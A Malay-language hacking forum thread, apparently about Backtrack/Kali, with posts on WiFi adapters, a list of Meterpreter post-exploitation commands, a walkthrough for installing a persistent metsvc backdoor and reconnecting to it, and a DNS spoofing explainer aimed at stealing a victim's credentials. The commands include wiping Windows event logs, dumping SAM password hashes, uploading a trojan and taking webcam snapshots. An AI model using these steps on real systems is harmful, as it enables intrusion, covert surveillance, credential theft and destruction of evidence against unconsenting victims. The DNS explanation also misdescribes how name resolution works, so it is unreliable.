BTC USD 83,909.4 Gold USD 4,285.46
Time now: Jun 1, 12:00 AM

Backtrack5/Kali Linux - Segalanya tentang Pentesting

:((:((:((
terkubur harapan ...
patut pun test berkali2 xjadi...nyesal beli signalking :(

kadang-kadang, dalam dunia hackin,anda tak semestinya perlu kepakaran komputer untuk hack sesuatu perkara, ..salah satu teknik yang dipangil SET( Social Engineering Technique), iaitu salah satu kaedah memanipulasi seseorang supaya target melakukan sesuatu kesilapan..

antara teknik yang boleh dilakukan SET+honeypot..tapi kawan memang tak kan terangkan disini kerana langkah kerja yang kompleks dan panjang..:D
 
Last edited:
RTL8187B:eek: monitor mode bermasalah. cipset reject kilang. kena2 power TX tak sampai 500mW,
RTL8187L bagus mesti sampai 1000mW TX power, bersusun2 WiFi:)cgrock

http://xiaopan.co orang dalam forum dia banyak pakai RTL8187L AWUS036H

betul bro..monitor mode memang bermasalah..kerap 'freeze'.kalau kerja -kerja yang guna airmon-ng memang jem sikit la:D..dan satu lagi masalah upload dia memang teruk,latency memang tinggi:((
 
Command Asas

Arahan –arahan asas Selepas Berjaya Masuk Ke Dalam Sesuatu Sistem

Setelah berjaya memasuki sesuatu sistem, adalah penting untuk mengetahui arahan asas, ianyanya penting kerana anda perlu terlebih dahulu mengetahui arahan tersebut bagi mengawal sesuatu sistem Tidak semua arahan akan diterangkan disini kerana terdapat arahan yang kompleks dan memerlukan penjelasan yang lebih terperinci. Berikut adalah arahan tersebut


1.Help : Akan mengeluarkan pertolongan arahan yang boleh dilaksanankan


2.background : Keluar dari meterpreter (tetapi tidak menutup meterpreter), untuk kembali kepada meterpreter taipkan
sessions –i 1
(sekiranya session meterpreter anda 1,sekiranya tidak pasti taip sessions)


3.cat : membaca fail text contoh nya *.txt, contoh arahan,anda mahu membaca file sayang.txt pada folder C:\fail\sayang.txt pergi ke folder tersebut dan taip cat sayang.txt


4.cd & pwd : CD : change folder, sekiranya anda mahu pergi sesuatu folder khas pwd : menunjukkan folder yang sedang ada berada


5.clearev : Memadam semua Perisian, Sistem dan log pada Sistem Windows. Contoh

Sebelum

Clearev_before.png

meterpreter > clearev

[*] Wiping 97 records from Application...

[*] Wiping 415 records from System...

[*] Wiping 0 records from Security...

meterpreter >

Selepas

Clearev_after.png

6.download : memuat turun sesuatu fail. Contoh nya terdapat video yang mahu dimuat turun pada folder C:\Video\BT5.avi, taipkan download C:\Video\BT5.avi atau sekiranya ada berada di folder tersebut hanya perlu taip download BT5.avi


7.edit : mengubah sesuatu fail contoh nya berformat *.txt,*.html,*.doc dan lain-lain, Ia akan menggunakan perisian “Vim


8.execute : menjalankan fail terutama *.exe. Contohnya winamp.exe pada folder C:\Program File\Winamp\Winamp.exe. Anda perlu menaip execute Winamp.exe sekiranya anda berada di folder tersebut


9.getuid : akan memaparkan User yang anda tengah jalankan “Meterpreter”


10.hashdump : akan memaparkan segala SAM Database dalam bentuk hash


11.idletime : akan memaparakan info User berapa lama telah meninggalkan komputer dalam keadaan tidak guna (idle)


12.ipconfig : memaparkan alamat IP sistem


13.run vnc : akan memaparkan paparan secara visual apa yang terdapat pada skrin sesuatu sistem


14.ls : seperti pada OS linux, ia akan memaparkan segala fail yang terdapat di dalam folder yang anda berada


15.kill : mematikan sesuatu proses, anda terlebih dahulu mengenal “PID” sesuatu perisian/proses,cari “PID” tersebut menggunakan arahan ps, selepas mengetahui “PID” untuk mematikannya, contoh mahu mematikan perisian Winamp.exe yang menggunakan PID 7236, taip kill 7236


16.ps : memaparkan Proses yang sedang berjalan. Ia dianggap seperti “Task Manager” pada OS Windows


17.exit : mematikan “meterpreter”


18.search : mencari sesuatu fail, contoh nya didalam satu folder, anda mahu mencari fail auto.exe hanya taipkan search auto.exe


19.shell : memaparkan shell asal sesuatu sistem. Sekiranya anda mahu keluar hanya taip exit


20.upload : memuat naik sesuatu fail, contoh anda mahu memuat naik fail tojan.exe (fail perlu berada pada folder root, taipkan
upload trojan.exe C:\Windows (sekiranya anda mahu memuat naik di folder tersebut)


21.webcam_list : menunjukkan senarai webcam

22.webcam_snap : mengambil gambar menggunakan webcam , contoh

Webcam_snap.png

Terdapat banyak lagi arahan yang anda boleh pelajari, seperti yang saya tulis sebelum ini, saya tidak akan menulis semua arahan, anda boleh menguji dan mengkaji sendiri dengan menggunakan perintah help
 
Backdoor : Memasuki semula sistem secara mudah

Setelah anda berhempas pulas untuk memasuki sesuatu sistem, adalah perlu untuk memuat naik ‘backdoor’ sekiranya anda mahu masuk semula ke sesuatu sistem dengan mudah tanpa perlu melakukan perkara rumit yang anda telah lakukan sebelum ini. Untuk langkah ini anda perlu memilik sesi “meterpreter” yang sedang aktif. Dengan menaip

run metsvc

akan keluar perkara seperti berikut

meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...

[*] >> Uploading metsrv.dll...

[*] >> Uploading metsvc-server.exe...

[*] >> Uploading metsvc.exe...

[*] Starting the service...

[*] * Installing service metsvc

* Starting service

Service metsvc successfully installed.

meterpreter >

Sekiranya perkataan “Service metsvc successfully installed” keluar, maka anda telah berjaya memuat naik fail backdoor. Selepas memuat naik backdoor, anda sudah tidak perlu lagi untuk risau sekiranya sistem OS telah dikemas kini atau “patch” pada loophole atau sistem itu dimatikan




Bagaimana mahu menyambungkan semula komputer yang telah dimuatnaik fail backdoor?

Mulakan perisian metsploit dan setelah selesai load

1.taipkan
use exploit/multi handler
2.taipkan
set PAYLOAD windows/metsvc_bind_tcp
3.taipkan
set RHOST 192.168.1.102
penerangan : RHOST adalah host target backdoor, sekiranya alamat IP telah bertukar, anda perlu mengenal pasti terlebih dahulu

4.Taipkan
Set LPORT 31337

5.Taipkan

sekiranya berjaya, backdoor akan menyambung semula kepada metasploit secara automatik dan akan mengeluarkan ‘meterpreter’
[*] Starting the payload handler...

[*] Started bind handler

[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)
 
Apa Itu Domain Name System (DNS)

Apa itu DNS? Ini adalah definisinya yang diambil dari wikipedia :

The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities.


Disini akan merangkan secara ringkas mengenai DNS ini. Baiklah apabila kita menulis laman web google dalam pelayar web kita iaitu www.google.com. Komputer anda tidak faham apa itu "www.google.com"? Dia hanya akan faham jika "www.google.com" itu ditukar kepada nombor atau dengan kata lainnya adalah Internet Protocol(IP) address laman web tersebut. Jadi komputer anda akan menghantar "www.google.com" ini ke DNS Server untuk mendapatkan IP address "www.google.com". Kita baca dialog antara komputer anda dan DNS Server di bawah ini :

Komputer : Selamat sejahtera DNS Server. :)

DNS Server : Selamat sejahtera juga komputer. ;)

Komputer : DNS Server, saya nak minta bantuan, boleh tak bagikan ip address "www.google.com"? Saya tak faham la.

DNS Server : Itu lah hang,, aku suruh hang pi belajar a,b,c hang malas. Tengok! Nak cari "www.google.com" pun susah. Hang pandai kira-kira nombor je. Disebabkan ini dah tugas aku, aku kena bagi juga la ipaddress nya. Ip address nya adalah 209.85.175.121. Dah faham?

Komputer : Hehe. Terima kasih DNS Server.

DNS Server : Okay. Tiada masalah

Itu lah perbualan antara DNS Server dengan komputer anda. Tapi ingat! Ini adalah dialog ciptaan saya supaya bagi anda faham. Jangan percaya bulat-bulat.

Baiklah. Bagaimana DNS Server ni mencari ip address "www.google.com"? DNS Server ni mencari ipaddress tersebut di dalam komputer anda dahulu. Apabila tidak jumpa, dia akan mencarinya didalam Local Area Network(LAN) anda pula. Jika tidak jumpa juga, baru la dia mencarinya di Wide Area Network(WAN). Sudah faham?
 
Konsep DNS Spoofing

Jadi di sini bagaimana DNS Spoofing ini dilakukan? Caranya adalah dengan menukar ip address laman web tersebut ke ip address yang kita suka. Sebagai contoh ip address "www.google.com" adalah 74.125.224.72.


Jadi jika mangsa saya buka laman web tersebut, dia akan pergi ke ip address yang telah diberikan. Jadi untuk menggodam mangsa anda, kita tukarkan ip address 74.125.224.72 ke ip address kita. Okay. Teknik ini selalunya di lakukan di dalam Local Area Network kita. Sebagai contoh ip address saya 192.168.0.9. Jadi saya tukar la 74.125.224.72 kepada 192.168.0.9.


Apabila mangsa membuka saja laman web tu, ianya memang akan pergi laman web "www.google.com" tetapi ip addressnya direct ke ip address saya. Jadi jika mangsa mengisi butiran-butiran maklumat dirinya di laman web tersebut, ianya akan dihantar ke ip address saya dan secara tidak langsung menghantarnya ke komputer saya! Jadi saya dapat mengetahui segala maklumat mangsa saya


dnspoisioning2.gif
 
Back
Top
Log in Register